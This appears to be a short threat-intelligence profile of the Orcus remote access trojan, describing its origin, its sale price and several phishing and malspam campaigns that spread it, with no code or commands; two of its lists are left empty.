Orcus RAT is a Remote Access Trojan that is active since 2016. Orcus was developed by a malware author who goes under the name ‘Sorzus’. This RAT has been sold for $40 since April 2016, with the ability to build custom plugins. Orcus RAT is primarily distributed via spear-phishing emails and drive-by-downloads.
Capabilities of Orcus RAT
The Remote Access Trojan’s capabilities include:
Orcus RAT distributed via decoy Word document
Researchers spotted a malspam campaign distributing Orcus RAT via malicious Microsoft Word documents.
Orcus RAT targets Bitcoin investors
A phishing campaign disguised as email marketing for new Bitcoin trading bot dubbed ‘Gunbot’ distributed Orcus RAT.
Tax-themed phishing campaign
In January 2018, researchers spotted various tax-related phishing campaigns targeting the US taxpayers with a range of RATs including Orcus RAT, Netwire, and Remcos RAT.
Ramadan-themed Coca-Cola video distributes Orcus RAT
In February 2019, researchers observed a malware campaign that distributed Orcus RAT inside a Ramadan-themed Coca-Cola video. Upon clicking the video, a series of downloads and processes were triggered, which includes:
Revenge RAT and Orcus RAT
In a recent malspam campaign, researchers spotted a threat actor distributing two popular remote access trojans to launch attacks against different organizations across various sectors. The targeted sectors include financial services, information technology, consultancies, and government entities.
The malspam emails purported to come from various authorities such as the Better Business Bureau (BBB), Australian Competition & Consumer Commission (ACCC), Ministry of Business Innovation & Employee (MBIE) and other regional agencies.
The emails included ZIP archives that contained malicious batch files responsible for retrieving the malicious PE32 file and dropping Orcus RAT and Revenge RAT onto victims’ systems.